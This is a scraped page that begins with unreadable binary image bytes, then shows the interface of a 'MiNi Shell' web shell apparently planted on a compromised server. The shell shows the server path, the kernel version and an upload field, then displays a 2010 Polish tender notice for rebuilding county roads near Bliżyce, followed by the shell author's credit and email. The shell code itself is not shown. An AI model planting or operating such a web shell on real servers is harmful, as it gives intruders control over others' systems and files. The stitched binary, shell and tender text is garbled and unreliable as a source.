JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100118/14000-N-2010.html

<p class="kh_header"><b>Żarki: Przebudowa dróg powiatowych:  Nr 1711S odcinek miejscowości Bliżyce od skrzyżowania z DP 3807S - do granicy powiatu zawierciańskiego oraz odcinek drogi powiatowej Nr 3807S Bliżyce -Sokolniki</b><br>
<b>Numer ogłoszenia: 14000 - 2010; data zamieszczenia: 18.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Myszkowie , ul. Myszkowska 59, 42-310 Żarki, woj. śląskie, tel. 034 3148304, faks 034 3148304.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.myszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg powiatowych:  Nr 1711S odcinek miejscowości Bliżyce od skrzyżowania z DP 3807S - do granicy powiatu zawierciańskiego oraz odcinek drogi powiatowej Nr 3807S Bliżyce -Sokolniki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje realizację zakresu rzeczowego robót budowlanych - drogowych polegających na wykonaniu przebudowy drogi powiatowej nr 1711S  odcinek od skrzyżowania z drogą powiatową nr 3807S w miejscowości Bliżyce - do granicy powiatu myszkowskiego z powiatem zawierciańskim  od km 1+452,87 do km 5+195,37 oraz łącznik droga powiatowa nr 3807S Bliżyce -Sokolniki od km 0+000 do km 0+657,50
1. Zakres przebudowy  obejmuje roboty drogowe  na odcinku 4,400  km zgodnie z  przedmiarem robót,  specyfikacjami wykonania i odbioru robót : 
 Roboty przygotowawcze obejmują: 
 - rozbiórki wjazdów wraz z przepustami 
 -  wycinkę kolidujących drzew
 -  rozebranie i zasypanie studni czerpalnej
 -  odwóz materiałów z rozbiórki i wycinki
 Roboty ziemne obejmują:
 -  zdjęcie warstwy humusu ( do wykorzystania w robotach wykończeniowych ) 
 -  mechaniczne wykonanie wykopów i nasypów  
 Roboty nawierzchniowe obejmują: 
 - wykonanie warstw konstrukcyjnych nośnych na poszerzeniach
 - wykonanie podbudowy bitumicznej 
 - wzmocnienie połączeń istniejącej jezdni i poszerzeń geosiatką 
 - wykonanie warstwy ścieralnej z betonu asfaltowego
 Budowa wjazdów i chodników obejmuje: 
 -  wykonanie podbudowy tłuczniowej  
 - wykonanie nawierzchni z kostki brukowej betonowej
 Budowa odwodnienia obejmuje: 
 -  budowę nowych lub przedłużenie istniejących przepustów pod koroną jezdni
 -  budowę przepustów pod wjazdami 
 -  budowę ścieku z elementów prefabrykowanych
 -  budowę rowów wraz z umocowaniem
 -  wykonanie obudowy wylotów elementów odwodnienia do rowu
 Roboty porządkowe i elementy bezpieczeństwa ruchu obejmują :
 -  budowę poręczy i barier energochłonnych na przebudowanym przepuście
 -  oznakowanie pionowe i poziome
 -  regulację pionową zasuw wodociągowych
 -  montaż rur osłonowych
 -  humusowanie obrzeży robót wraz z obsianiem trawą.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.20-7, 45.23.32.33-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Kwota wadium wymagana do wzięcia udziału w postępowaniu :  120.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający określa następujące warunki udziału w postępowaniu: 
1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki art. 22 ust.1 ustawy, dotyczące:
a)  posiadania uprawnień  do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają  obowiązek ich posiadania,  
b)  posiadania wiedzy i doświadczenia,
c)  dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia ,
d)  sytuacji ekonomicznej i finansowej ,
2. Za spełnienie warunków określonych w punkcie 1 . Zamawiający uzna jeżeli wykonawcy :
a)  dysponują co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń , określonymi przepisami ustawy - Prawo budowlane. 
Kadra kierownicza winna legitymować się przynależnością do  Okręgowej Izby Inżynierów  Budownictwa.
W przypadku nie dysponowania osobami zdolnymi do wykonania zamówienia oprócz w/w dokumentów należy dołączyć pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonaniu zamówienia .
b)  wykażą i udokumentują , że  w ciągu ostatnich pięciu  lat przed wszczęciem postępowania 
     o  udzielenie zamówienia publicznego , a jeżeli okres prowadzenia działalności jest krótszy - 
     w tym okresie,  wykonali  minimum  2 roboty budowlane polegające na przebudowie dróg 
     publicznych odpowiadających swoim rodzajem przedmiotowi zamówienia  o wartości minimum 
     5.000.000,00 zł (brutto) każda, z podaniem ich  wartości ,  oraz daty i miejsca wykonania.
     Do każdego wykazanego zadania należy dołączyć dokument , że roboty zostały wykonane 
     należycie. Dokumenty należy  przedstawić w kolejności zgodnej z wykazem.
Przez roboty odpowiadające swoim rodzajem przedmiotowi zamówienia rozumie się 
      przebudowę dróg publicznych polegających na wykonaniu robót z zakresu wykonania 
nawierzchni bitumicznych wraz z chodnikami.
c)	wykażą  niezbędne  narzędzia i urządzenia techniczne  w celu realizacji zamówienia raz z 
     informacją o podstawie dysponowania tymi zasobami :
             Wykonawca  musi wykazać minimum posiadania:  
                   - walec drogowy stalowy wibracyjny 8-10T   - 1 szt
                   - walec drogowy gumowo-stalowy               -  1 szt 
                   - skrapiarka samojezdna do bitumu              - 1 szt         
                   - samochody samowyładowcze min 10 T wyposażone w plandeki     -  4 szt 
                   - szczotka mechaniczna (bez ciągnika) -         1 szt 
                   - rozkładarka mas bitumicznych wyposażona w elektroniczny układ kontroli równości i   
                     ubijaki  zagęszczające                            -      1szt
                   -  frezarka                                                 -       1szt      
                   - wytwórnia mas bitumicznych o wydajności nie mniejszej niż 100Mg/godz. z 
                     automatycznym  zespołem sterowania procesem produkcji, własna lub  umowa 
                     podpisana z taką wytwórnią na obsługę  przedmiotu zamówienia ;

d)  posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
  o wartości min. 4.000.000 zł

3. W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają  wykluczeniu na podstawie art. 24 ust.1 ustawy . 

Zamawiający będzie dokonywał oceny spełnienia tych warunków oraz sprawdzenia kompletności i poprawności na podstawie oświadczeń i dokumentów dostarczonych zgodnie z Rozdziałem VI SIWZ . Warunki będą oceniane wg  zasady spełnia - nie spełnia.
Zamawiający  wymaga spełnienia wszystkich tych warunków.
Z treści załączonych dokumentów i oświadczeń  musi jednoznacznie wynikać, że Wykonawca spełnia warunki. Brak dokumentów lub oświadczeń wymienionych w rozdziale VI SIWZ lub ich nie uzupełnienie we wskazanym przez Zamawiającego terminie, w trybie art.26 ust.3 ustawy , skutkuje wykluczeniem Wykonawcy. Oferta Wykonawcy wykluczonego podlega odrzuceniu ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty;

                       1. Potwierdzające, spełnienie warunków udziału w postępowaniu:
                           a)  Wypełniony formularz oferty z wykorzystaniem wzoru  -  załącznik Nr 1 do SIWZ;
  b) Oświadczenie o spełnieniu warunków art.22 ust. 1 Prawa zamówień publicznych  - stanowiący
      załącznik Nr  2 do SIWZ 
  c) Wykaz  zrealizowanych robót budowlanych w ciągu ostatnich pięciu  lat przed wszczęciem 
      postępowania o  udzielenie zamówienia publicznego , a jeżeli okres prowadzenia działalności 
      jest krótszy -  w tym okresie, który należy załączyć do oferty , będą wykonane  minimum
      2 zadania  odpowiadające swoim rodzajem przedmiotowi zamówienia  o wartości minimum  
      5.000.000,00 zł (brutto) każda, z podaniem ich  wartości  oraz daty i miejsca wykonania 
      - na lub wg druku stanowiącego Załącznik Nr 4 do SIWZ      
      Do każdego wykazanego zadania należy dołączyć dokument , że roboty zostały wykonane 
      należycie. Dokumenty należy przedstawić w kolejności zgodnej z wykazem.
      Przez roboty odpowiadające swoim rodzajem przedmiotowi zamówienia rozumie się 
      przebudowę dróg publicznych polegających na wykonaniu robót z zakresu wykonania 
      nawierzchni bitumicznych wraz  z chodnikami.
  d)  wykaz  narzędzi i urządzeń technicznych niezbędnych w celu realizacji zamówienia raz z 
 informacją o podstawie dysponowania tymi zasobami : wykonawca wykaże sprzęt i 
          urządzenia  własne i obce(np. dzierżawione, wylesingowane itp.) , które będzie używał przy  
          realizacji zamówienia, przy czym  wykonawca  musi wykazać minimum posiadania:  
                   - walec drogowy stalowy wibracyjny 8-10T   - 1 szt
                   - walec drogowy gumowo-stalowy               - 1 szt 
                   - skrapiarka samojezdna do bitumu              - 1 szt         
                   - samochody samowyładowcze min 10 T wyposażone w plandeki     -  4 szt 
                   - szczotka mechaniczna (bez ciągnika) -         1 szt 
                   - rozkładarka mas bitumicznych wyposażona w elektroniczny układ kontroli równości
                     i ubijaki  zagęszczające                               - 1szt
                   -  frezarka                                                      - 1szt      
                   - wytwórnia mas bitumicznych o wydajności nie mniejszej niż 100Mg/godz 
                     z automatycznym zespołem sterowania procesem produkcji, własna lub  umowa
                     podpisana z taką wytwórnią na obsługę  przedmiotu zamówienia   na  lub wg 
                     druku  stanowiącego Załącznik Nr 6  do SIWZ
    
e) wykaz osób, które będą uczestniczyć w  wykonaniu zamówienia, w szczególności 
 odpowiedzialnych za kierowanie robotami budowlanymi wraz z  informacjami na temat ich    kwalifikacji zawodowych ,  doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania  tymi osobami na lub wg  dokumentu stanowiącego   Załącznik Nr 5 do SIWZ; 

f)  dokumenty stwierdzające, że  kierownik budowy do kierowania i nadzorowania robót 
        budowlanych  posiada wymagane uprawnienia, jeżeli ustawy - Prawo Budowlane nakładają
        obowiązek  posiadania takich uprawnień, tj. dokumenty potwierdzające uprawnienia zawodowe - 
        uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w 
        specjalności  drogowej,- oraz dokument stwierdzający , że jest on aktualnym członkiem 
        Izby Inżynierów Budownictwa.

h)	Opłacona polisa ubezpieczeniowa  o wartości min. 4.000.000 zł ,a w przypadku jej braku inny 
    dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w
     zakresie prowadzonej działalności związanej z przedmiotem zamówienia ;

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zadania. 

2. Potwierdzające brak podstaw do wykluczenia z postępowania o udzielenie zamówienia:
 
a)  oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia w okolicznościach , o których mowa w art. 24 ust.1 Prawa zamówień publicznych - na lub wg  dokumentu stanowiącego   Załącznik Nr 3 do SIWZ;

b)  aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru,
w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;

c) aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego,
że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

d) aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub
Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 
3 miesiące przed upływem terminu składania wniosków o  dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

e) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.
1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu
składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia
albo składania ofert;

f) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.
1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu
składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia
albo składania ofert.

3. Dopuszcza się składanie ofert przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia :
a)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,
b)	ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów;
c)	pełnomocnictwo musi jednocześnie wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną , fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem;
d)	przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza , Zamawiający może wezwać do przedstawienia umowy regulującej współpracę tych Wykonawców. 
4 . Oferta wspólna , składana przez dwóch lub więcej Wykonawców powinna spełniać następujące wymagania:
a)   musi być zgodna z postanowieniami SIWZ;
b)   sposób składania oświadczeń i dokumentów w przypadku składania oferty wspólnej: 
       1)   dokumenty wspólne , takie jak:
              - oferta  
              - oświadczenie o spełnieniu warunków art.22 ust. 1
              - wykaz wykonanych robót budowlanych  ( załącznik Nr 4 do SIWZ )
              -  dokumenty potwierdzające  , że roboty zostały wykonane  należycie.
              - wykaz  narzędzi i urządzeń technicznych( załącznik Nr 6 do SIWZ)
              -  wykaz osób, które będą uczestniczyć w  wykonaniu zamówienia( załącznik Nr 5 do SIWZ)

Podpisują wszyscy członkowie konsorcjum lub Pełnomocnik w imieniu całego konsorcjum .

   2)  oświadczenia i dokumenty , takie jak: 
         -  oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia w 
            okolicznościach , o których mowa w art. 24 ust.1 Prawa zamówień publicznych 
      -  odpisu z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności 
         gospodarczej 
      -  zaświadczenia właściwego naczelnika Urzędu Skarbowego
         -  zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub
            Kasy Rolniczego Ubezpieczenia Społecznego
        -   informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy
        -   informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy

Składa każdy z partnerów konsorcjum w imieniu swojej firmy

5. Podwykonawcy -  Wykonawca wskaże w  ofercie część zamówienia ,której wykonanie zamierza powierzyć podwykonawcom , zgodnie z art. 36 ust 4 ustawy.
W przypadku, gdy Wykonawca nie zamierza powierzyć części zamówienia podwykonawcy, informacje o tym punkcie należy pominąć lub zaznaczyć z adnotacją  nie potrzebne skreślić    

6. Wykonawcy zagraniczni - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,  zamiast dokumentów, o których mowa w Rozdziale VI pkt. 2 b), c), d),  e), f)  SIWZ  składa dokumenty o których mowa w § 4 Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2009r w sprawie rodzajów dokumentów,  jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być  składane (Dz. U. z 2009 r. Nr 226, poz.1817),  

7. Dowód wniesienia wadium bądź dokument świadczący o zabezpieczeniu wadium;
8. Zaakceptowany projekt umowy stanowiący załącznik  Nr 8 do SIWZ;
9. Kosztorys uproszczony.

W/w dokumenty   należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu w przypadku, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawidłowości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pzd.myszkow .pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Myszkowie z/s w Żarkach
	ul. Myszkowska 59 ,  42-310 Żarki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2010 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Myszkowie     z/s w Żarkach ul. Myszkowska 59, 42-310 Żarki  (sekretariat)-pok. Nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze Środków Unii europejskiej w ramach 
REGIONALNEGO PROGRAMU operacyjnego Województwa Śląskiego na lata 2007-2013  Priorytet VII  Transport 
Działanie 7.1  Modernizacja i rozbudowa sieci drogowej

Creat By MiNi SheLL
Email: jattceo@gmail.com